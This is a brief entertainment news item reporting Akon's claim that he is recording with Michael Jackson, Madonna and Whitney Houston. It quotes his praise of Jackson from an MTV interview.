Akon and Jackson unite

Akon is recording with Michael Jackson, Madonna and Whitney Houston, he has claimed.

The controversial star has revealed news of the trio of collaborations in a new interview, although there are no official details about future releases.

Speaking about Jackson, who is thought to have been working on a new album for some time, Akon spoke enthusiastically about the pop legend.

"He's incredible. He's a genius. Just to be in the same room (with him), I felt everything I wanted to accomplish in life has been achieved.

"We about to shake the world up, man. You know how you be with somebody and you can't even explain?", he said.

"The way he thinks...some artists think regional, some think national, I was thinking international. He thinks planets. It's on another level", Akon told MTV.
